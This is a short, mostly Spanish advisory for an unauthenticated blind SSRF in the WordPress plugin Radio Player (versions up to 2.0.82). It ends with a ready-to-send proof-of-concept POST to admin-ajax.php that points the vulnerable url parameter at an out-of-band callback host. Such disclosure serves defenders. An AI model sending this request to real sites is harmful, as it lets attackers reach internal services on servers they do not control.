
Radio Player <= 2.0.82 - Falsificación de solicitudes del lado del servidor (SSRF) ciega no autenticada
Radio Player <= 2.0.82 - Server-Side Request Forgery no autenticado
El plugin de WordPress Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress es vulnerable a Server-Side Request Forgery en todas las versiones hasta la 2.0.82 inclusive. Esto permite que atacantes no autenticados realicen solicitudes web a ubicaciones arbitrarias originadas desde la aplicación web, lo que puede utilizarse para consultar y modificar información de servicios internos.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8